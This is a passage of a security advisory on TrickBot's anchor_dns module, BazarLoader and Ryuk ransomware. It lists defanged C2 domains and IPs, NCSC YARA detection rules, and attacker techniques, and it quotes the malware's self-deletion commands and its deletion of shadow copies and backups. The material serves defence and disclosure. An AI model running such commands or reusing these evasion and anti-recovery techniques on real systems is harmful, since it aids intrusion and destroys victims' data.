<code>anchorDiag.txt</code> in one of the directories listed above.</p> <p>Part of the initial network communications with the C2 server involves sending information about the victim machine such as its computer name/hostname, operating system version, and build via a base64-encoded <code>GUID</code>. The <code>GUID </code>is composed of <code>/GroupID/ClientID/</code> with the following naming convention:</p> <p><code>/anchor_dns/[COMPUTERNAME]_[WindowsVersionBuildNo].[32CharacterString]/</code>.</p> <p>The malware uses scheduled tasks that run every 15 minutes to ensure persistence on the victim machine. The scheduled task typically uses the following naming convention.</p> <p><code>[random_folder_name_in_%APPDATA%_excluding_Microsoft]</code></p> <p><code>autoupdate#[5_random_numbers] (e.g., Task autoupdate#16876)</code>.</p> <p>After successful execution, <code>anchor_dns</code> further deploys malicious batch scripts (<code>.bat</code>) using PowerShell commands.</p> <p>The malware deploys self-deletion techniques by executing the following commands.</p> <ul> <li><code>cmd.exe /c timeout 3 &amp;&amp; del C:\Users\[username]\[malware_sample]</code></li> <li><code>cmd.exe /C PowerShell \"Start-Sleep 3; Remove-Item C:\Users\[username]\[malware_sample_location]\"</code></li> </ul> <p>The following domains found in outbound DNS records are associated with <code>anchor_dns</code>.</p> <ul> <li><code>kostunivo[.]com</code></li> <li><code>chishir[.]com</code></li> <li><code>mangoclone[.]com</code></li> <li><code>onixcellent[.]com</code></li> </ul> <p>This malware used the following legitimate domains to test internet connectivity.</p> <ul> <li><code>ipecho[.]net</code></li> <li><code>api[.]ipify[.]org</code></li> <li><code>checkip[.]amazonaws[.]com</code></li> <li><code>ip[.]anysrc[.]net</code></li> <li><code>wtfismyip[.]com</code></li> <li><code>ipinfo[.]io</code></li> <li><code>icanhazip[.]com</code></li> <li><code>myexternalip[.]com</code></li> <li><code>ident[.]me</code></li> </ul> <p>Currently, there is an open-source tracker for TrickBot C2 servers located at <a href="https://feodotracker.abuse.ch/browse/trickbot/">https://feodotracker.abuse.ch/browse/trickbot/</a>.</p> <p>The <code>anchor_dns</code> malware historically used the following C2 servers.</p> <ul> <li><code>23[.]95[.]97[.]59</code></li> <li><code>51[.]254[.]25[.]115</code></li> <li><code>193[.]183[.]98[.]66</code></li> <li><code>91[.]217[.]137[.]37</code></li> <li><code>87[.]98[.]175[.]85</code></li> </ul> <h4>TrickBot YARA Rules</h4> <div class="special_container">rule anchor_dns_strings_filenames {<br /> &nbsp;&nbsp;&nbsp; meta:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Rule to detect AnchorDNS samples based off strings or filenames used in malware"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = "NCSC"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = "fc0efd612ad528795472e99cae5944b68b8e26dc"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash2 = "794eb3a9ce8b7e5092bb1b93341a54097f5b78a9"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash3 = "9dfce70fded4f3bc2aa50ca772b0f9094b7b1fb2"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash4 = "24d4bbc982a6a561f0426a683b9617de1a96a74a"<br /> &nbsp;&nbsp;&nbsp; strings:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = ",Control_RunDLL \x00"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = ":$GUID" ascii wide<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = ":$DATA" ascii wide<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "/1001/"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = /(\x00|\xCC)qwertyuiopasdfghjklzxcvbnm(\x00|\xCC)/<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = /(\x00|\xCC)QWERTYUIOPASDFGHJKLZXCVBNM(\x00|\xCC)/<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "start program with cmdline \"%s\""<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "Global\\fde345tyhoVGYHUJKIOuy"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "ChardWorker::thExecute: error registry me"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "get command: incode %s, cmdid \"%s\", cmd \"%s\""<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "anchorDNS"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "Anchor_x86"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "Anchor_x64"<br /> &nbsp;&nbsp;&nbsp; condition:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and 3 of them<br /> }</div> <div class="special_container">rule anchor_dns_icmp_transport {<br /> &nbsp;&nbsp;&nbsp; meta:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Rule to detect AnchorDNS samples based off ICMP transport strings"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = "NCSC"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = "056f326d9ab960ed02356b34a6dcd72d7180fc83"<br /> &nbsp;&nbsp;&nbsp; strings:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "reset_connection &lt;- %s"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "server_ok &lt;- %s (packets on server %s)"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "erase successfully transmitted packet (count: %d)"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "Packet sended with crc %s -&gt; %s"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "send data confimation to server(%s)"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "data recived from &lt;- %s"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "Rearmost packed recived (id: %s)"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "send poll to server -&gt; : %s"<br /> &nbsp;&nbsp;&nbsp; condition:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and 3 of them<br /> }</div> <div class="special_container">rule anchor_dns_config_dexor {<br /> &nbsp;&nbsp;&nbsp; meta:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Rule to detect AnchorDNS samples based off configuration deobfuscation (XOR 0x23 countup)"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = "NCSC"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = "d0278ec015e10ada000915a1943ddbb3a0b6b3db"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash2 = "056f326d9ab960ed02356b34a6dcd72d7180fc83"<br /> &nbsp;&nbsp;&nbsp; strings:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $x86 = {75 1F 56 6A 40 B2 23 33 C9 5E 8A 81 ?? ?? ?? ?? 32 C2 FE C2 88 81 ?? ?? ?? ?? 41 83 EE 01 75 EA 5E B8 ?? ?? ?? ?? C3}<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $x64 = {41 B0 23 41 B9 80 00 00 00 8A 84 3A ?? ?? ?? 00 41 32 C0 41 FE C0 88 04 32 48 FF C2 49 83 E9 01 75 E7}<br /> &nbsp;&nbsp;&nbsp; condition:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them<br /> }</div> <div class="special_container">rule anchor_dns_installer {<br /> &nbsp;&nbsp;&nbsp; meta:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Rule to detect AnchorDNS installer samples based off MZ magic under one-time pad or deobfuscation loop code"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = "NCSC"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = "fa98074dc18ad7e2d357b5d168c00a91256d87d1"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash2 = "78f0737d2b1e605aad62af252b246ef390521f02"<br /> &nbsp;&nbsp;&nbsp; strings:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $pre = {43 00 4F 00 4E 00 4F 00 55 00 54 00 24 00 00 00} //CONOUT$<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $pst = {6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00} //kernel32.dll<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $deob_x86 = {8B C8 89 4D F8 83 F9 FF 74 52 46 89 5D F4 88 5D FF 85 F6 74 34 8A 83 ?? ?? ?? ?? 32 83 ?? ?? ?? ?? 6A 00 88 45 FF 8D 45 F4 50 6A 01 8D 45 FF 50 51 FF 15 34 80 41 00 8B 4D F8 43 8B F0 81 FB 00 ?? ?? ?? 72 CC 85 F6 75 08}<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $deob_x64 = {42 0F B6 84 3F ?? ?? ?? ?? 4C 8D 8C 24 80 00 00 00 42 32 84 3F ?? ?? ?? ?? 48 8D 54 24 78 41 B8 01 00 00 00 88 44 24 78 48 8B CE 48 89 6C 24 20 FF 15 ?? ?? ?? ?? 48 FF C7 8B D8 48 81 FF ?? ?? ?? ?? 72 B8}<br /> &nbsp;&nbsp;&nbsp; condition:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; and<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (&nbsp;&nbsp; uint16(@pre+16) ^ uint16(@pre+16+((@pst-(@pre+16))\2)) == 0x5A4D<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; or<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $deob_x86 or $deob_x64<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )<br /> }</div> <div class="special_container">import "pe"<br /> rule anchor_dns_string_1001_with_pe_section_dll_export_resolve_ip_domains {<br /> &nbsp;&nbsp;&nbsp; meta:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Rule to detect AnchorDNS samples based off /1001/ string in combination with DLL export name string, PE section .addr or IP resolution domains"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = "NCSC"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = "ff8237252d53200c132dd742edc77a6c67565eee"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash2 = "c8299aadf886da55cb47e5cbafe8c5a482b47fc8"<br /> &nbsp;&nbsp;&nbsp; strings:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $str1001 = {2F 31 30 30 31 2F 00} // /1001/<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $strCtrl = {2C 43 6F 6E 74 72 6F 6C 5F 52 75 6E 44 4C 4C 20 00} // ,Control_RunDLL<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip1 = "checkip.amazonaws.com" ascii wide<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip2 = "ipecho.net" ascii wide<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip3 = "ipinfo.io" ascii wide<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip4 = "api.ipify.org" ascii wide<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip5 = "icanhazip.com" ascii wide<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip6 = "myexternalip.com" ascii wide<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip7 = "wtfismyip.com" ascii wide<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip8 = "ip.anysrc.net" ascii wide<br /> &nbsp;&nbsp;&nbsp; condition:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; and $str1001<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; and (<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; for any i in (0..pe.number_of_sections): (<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; pe.sections[i].name == ".addr"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; or<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $strCtrl<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; or<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 6 of ($ip*)<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )<br /> }</div> <div class="special_container">rule anchor_dns_check_random_string_in_dns_response {<br /> &nbsp;&nbsp;&nbsp; meta:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Rule to detect AnchorDNS samples based off checking random string in DNS response"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = "NCSC"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = "056f326d9ab960ed02356b34a6dcd72d7180fc83"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash2 = "14e9d68bba7a184863667c680a8d5a757149aa36"<br /> &nbsp;&nbsp;&nbsp; strings:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $x86 = {8A D8 83 C4 10 84 DB 75 08 8B 7D BC E9 84 00 00 00 8B 7D BC 32 DB 8B C7 33 F6 0F 1F 00 85 C0 74 71 40 6A 2F 50 E8 ?? ?? ?? ?? 46 83 C4 08 83 FE 03 72 EA 85 C0 74 5B 83 7D D4 10 8D 4D C0 8B 75 D0 8D 50 01 0F 43 4D C0 83 EE 04 72 11 8B 02 3B 01 75 10 83 C2 04 83 C1 04 83 EE 04 73 EF 83 FE FC 74 2D 8A 02 3A 01 75 29 83 FE FD 74 22 8A 42 01 3A 41 01 75 1C 83 FE FE 74 15 8A 42 02 3A 41 02 75 0F 83 FE FF 74 08 8A 42 03 3A 41 03 75 02 B3 01 8B 75 B8}<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $x64 = {4C 39 75 EF 74 56 48 8D 45 DF 48 83 7D F7 10 48 0F 43 45 DF 49 8B FE 48 85 C0 74 40 48 8D 48 01 BA 2F 00 00 00 E8 ?? ?? ?? ?? 49 03 FF 48 83 FF 03 72 E4 48 85 C0 74 24 48 8D 55 1F 48 83 7D 37 10 48 0F 43 55 1F 48 8D 48 01 4C 8B 45 2F E8 ?? ?? ?? ?? 0F B6 DB 85 C0 41 0F 44 DF 49 03 F7 48 8B 55 F7 48 83 FE 05 0F 82 6A FF FF FF}<br /> &nbsp;&nbsp;&nbsp; condition:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them<br /> }</div> <div class="special_container">rule anchor_dns_default_result_execute_command {<br /> &nbsp;&nbsp;&nbsp; meta:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Rule to detect AnchorDNS samples based off default result value and executing command"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = "NCSC"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = "056f326d9ab960ed02356b34a6dcd72d7180fc83"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash2 = "14e9d68bba7a184863667c680a8d5a757149aa36"<br /> &nbsp;&nbsp;&nbsp; strings:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $x86 = {83 C4 04 3D 80 00 00 00 73 15 8B 04 85 ?? ?? ?? ?? 85 C0 74 0A 8D 4D D8 51 8B CF FF D0 8A D8 84 DB C7 45 A4 0F 00 00 00}<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $x64 = {48 98 B9 E7 03 00 00 48 3D 80 00 00 00 73 1B 48 8D 15 ?? ?? ?? ?? 48 8B 04 C2 48 85 C0 74 0B 48 8D 55 90 48 8B CE FF D0 8B C8}<br /> &nbsp;&nbsp;&nbsp; condition:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them<br /> }</div> <div class="special_container">rule anchor_dns_pdbs {<br /> &nbsp;&nbsp;&nbsp; meta:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Rule to detect AnchorDNS samples based off partial PDB paths"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = "NCSC"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = "f0e575475f33600aede6a1b9a5c14f671cb93b7b"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash2 = "1304372bd4cdd877778621aea715f45face93d68"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash3 = "e5dc7c8bfa285b61dda1618f0ade9c256be75d1a"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash4 = "f96613ac6687f5dbbed13c727fa5d427e94d6128"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash5 = "46750d34a3a11dd16727dc622d127717beda4fa2"<br /> &nbsp;&nbsp;&nbsp; strings:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = ":\\MyProjects\\secondWork\\Anchor\\"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = ":\\simsim\\anchorDNS"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = ":\\[JOB]\\Anchor\\"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = ":\\Anchor\\Win32\\Release\\Anchor_"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = ":\\Users\\ProFi\\Desktop\\data\\Win32\\anchor"<br /> &nbsp;&nbsp;&nbsp; condition:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them<br /> }</div> <h4>BazarLoader/BazarBackdoor</h4> <p>Beginning in approximately early 2020, actors believed to be associated with TrickBot began using BazarLoader and BazarBackdoor to infect victim networks. The loader and backdoor work closely together to achieve infection and communicate with the same C2 infrastructure. Campaigns using Bazar represent a new technique for cybercriminals to infect and monetize networks and have increasingly led to the deployment of ransomware, including Ryuk. BazarLoader has become one of the most commonly used vectors for ransomware deployment.</p> <p>Deployment of the BazarLoader malware typically comes from phishing email and contains the following:</p> <ul> <li>Phishing emails are typically delivered by commercial mass email delivery services. Email received by a victim will contain a link to an actor-controlled Google Drive document or other free online filehosting solutions, typically purporting to be a PDF file.</li> <li>This document usually references a failure to create a preview of the document and contains a link to a URL hosting a malware payload in the form of a misnamed or multiple extension file.</li> <li>Emails can appear as routine, legitimate business correspondence about customer complaints, hiring decision, or other important tasks that require the attention of the recipient. &nbsp;</li> <li>Some email communications have included the recipient’s name or employer name in the subject line and/or email body.</li> </ul> <p>Through phishing emails linking users to Google Documents, actors used the below identified file names to install BazarLoader:</p> <ul> <li><code>Report-Review26-10.exe</code></li> <li><code>Review_Report15-10.exe</code></li> <li><code>Document_Print.exe</code></li> <li><code>Report10-13.exe</code></li> <li><code>Text_Report.exe</code></li> </ul> <p>Bazar activity can be identified by searching the system startup folders and Userinit values under the <code>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon</code> registry key:</p> <p><code>%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\adobe.lnk</code></p> <p>For a comprehensive list of indicators of compromise regarding the BazarLocker and other malware, see <a href="https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html">https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html</a>.</p> <h4>Indicators</h4> <p>In addition to TrickBot and BazarLoader, threat actors are using malware, such as KEGTAP, BEERBOT, SINGLEMALT, and others as they continue to change tactics, techniques, and procedures in their highly dynamic campaign. The following C2 servers are known to be associated with this malicious activity.</p> <ul> <li><code>45[.]148[.]10[.]92</code></li> <li><code>170[.]238[.]117[.]187</code></li> <li><code>177[.]74[.]232[.]124</code></li> <li><code>185[.]68[.]93[.]17</code></li> <li><code>203[.]176[.]135[.]102</code></li> <li><code>96[.]9[.]73[.]73</code></li> <li><code>96[.]9[.]77[.]142</code></li> <li><code>37[.]187[.]3[.]176</code></li> <li><code>45[.]89[.]127[.]92</code></li> <li><code>62[.]108[.]35[.]103</code></li> <li><code>91[.]200[.]103[.]242</code></li> <li><code>103[.]84[.]238[.]3</code></li> <li><code>36[.]89[.]106[.]69</code></li> <li><code>103[.]76[.]169[.]213</code></li> <li><code>36[.]91[.]87[.]227</code></li> <li><code>105[.]163[.]17[.]83</code></li> <li><code>185[.]117[.]73[.]163</code></li> <li><code>5[.]2[.]78[.]118</code></li> <li><code>185[.]90[.]61[.]69</code></li> <li><code>185[.]90[.]61[.]62</code></li> <li><code>86[.]104[.]194[.]30</code></li> <li><code>31[.]131[.]21[.]184</code></li> <li><code>46[.]28[.]64[.]8</code></li> <li><code>104[.]161[.]32[.]111</code></li> <li><code>107[.]172[.]140[.]171</code></li> <li><code>131[.]153[.]22[.]148</code></li> <li><code>195[.]123[.]240[.]219</code></li> <li><code>195[.]123[.]242[.]119</code></li> <li><code>195[.]123[.]242[.]120</code></li> <li><code>51[.]81[.]113[.]25</code></li> <li><code>74[.]222[.]14[.]27</code></li> </ul> <h4>Ryuk Ransomware</h4> <p>Typically Ryuk has been deployed as a payload from banking Trojans such as TrickBot. (See the <a href="https://www.ncsc.gov.uk/news/ryuk-advisory">United Kingdom (UK) National Cyber Security Centre (NCSC) advisory, Ryuk Ransomware Targeting Organisations Globally</a>, on their ongoing investigation into global Ryuk ransomware campaigns and associated Emotet and TrickBot malware.) Ryuk first appeared in August 2018 as a derivative of Hermes 2.1 ransomware, which first emerged in late 2017 and was available for sale on the open market as of August 2018. Ryuk still retains some aspects of the Hermes code. For example, all of the files encrypted by Ryuk contain the <code>HERMES </code>tag but, in some infections, the files have <code>.ryk</code> added to the filename, while others do not. In other parts of the ransomware code, Ryuk has removed or replaced features of Hermes, such as the restriction against targeting specific Eurasia-based systems.</p> <p>While negotiating the victim network, Ryuk actors will commonly use commercial off-the-shelf products—such as Cobalt Strike and PowerShell Empire—in order to steal credentials. Both frameworks are very robust and are highly effective dual-purpose tools, allowing actors to dump clear text passwords or hash values from memory with the use of Mimikatz. This allows the actors to inject malicious dynamic-link library into memory with read, write, and execute permissions. In order to maintain persistence in the victim environment, Ryuk actors have been known to use scheduled tasks and service creation.</p> <p>Ryuk actors will quickly map the network in order to enumerate the environment to understand the scope of the infection. In order to limit suspicious activity and possible detection, the actors choose to live off the land and, if possible, use native tools—such as net view, net computers, and ping—to locate mapped network shares, domain controllers, and active directory. In order to move laterally throughout the network, the group relies on native tools, such as PowerShell, Windows Management Instrumentation (WMI), Windows Remote Management , and Remote Desktop Protocol (RDP). The group also uses third-party tools, such as Bloodhound.</p> <p>Once dropped, Ryuk uses AES-256 to encrypt files and an RSA public key to encrypt the AES key. The Ryuk dropper drops a <code>.bat</code> file that attempts to delete all backup files and Volume Shadow Copies (automatic backup snapshots made by Windows), preventing the victim from recovering encrypted files without the decryption program.</p> <p>In addition, the attackers will attempt to shut down or uninstall security applications on the victim systems that might prevent the ransomware from executing. Normally this is done via a script, but if that fails, the attackers are capable of manually removing the applications that could stop the attack. The <code>RyukReadMe</code> file placed on the system after encryption provides either one or two email&nbsp; addresses, using the end-to-end encrypted email provider Protonmail, through which the victim can contact the attacker(s). While earlier versions provide a ransom amount in the initial notifications, Ryuk users are now designating a ransom amount only after the victim makes contact.</p> <p>The victim is told how much to pay to a specified Bitcoin wallet for the decryptor and is provided a sample decryption of two files.</p> <p>Initial testing indicates that the <code>RyukReadMe</code> file does not need to be present for the decryption script to run successfully but other reporting advises some files will not decrypt properly without it. Even if run correctly, there is no guarantee the decryptor will be effective. This is further complicated because the <code>RyukReadMe</code> file is deleted when the script is finished. This may affect the decryption script unless it is saved and stored in a different location before running.</p> <p>According to MITRE, <a href="https://attack.mitre.org/versions/v7/software/S0446/">Ryuk </a>uses the ATT&amp;CK techniques listed in table 1.</p> <p class="text-align-center"><em>Table 1: Ryuk ATT&amp;CK techniques</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 881.46px; height: 312px; margin-right: auto; margin-left: auto;"> <thead> <tr> <th scope="col" style="width: 198px;"><strong>Technique</strong></th> <th scope="col" style="width: 356px;"><strong>Use</strong></th> </tr> </thead> <tbody> <tr> <td scope="col" style="width: 198px; text-align: left;">System Network Configuration Discovery [<a href="https://attack.mitre.org/versions/v7/techniques/T1016/">T1016</a>]</td> <td scope="col" style="width: 356px; text-align: left;">Ryuk has called <code>GetIpNetTable</code> in attempt to identify all mounted drives and hosts that have Address Resolution Protocol entries.&nbsp;</td> </tr> <tr> <td scope="col" style="width: 198px; text-align: left;"> <p>Masquerading: Match Legitimate Name or Location [<a href="https://attack.mitre.org/versions/v7/techniques/T1036/005/">T1036.005</a>]</p> </td> <td scope="col" style="width: 356px; text-align: left;">Ryuk has constructed legitimate appearing installation folder paths by calling <code>GetWindowsDirectoryW</code> and then inserting a null byte at the fourth character of the path. For Windows Vista or higher, the path would appear as <code>C:\Users\Public</code>.&nbsp;</td> </tr> <tr> <td scope="col" style="width: 198px; text-align: left;">Process Injection [<a href="https://attack.mitre.org/versions/v7/techniques/T1055/">T1055</a>]</td> <td scope="col" style="width: 356px; text-align: left;">Ryuk has injected itself into remote processes to encrypt files using a combination of 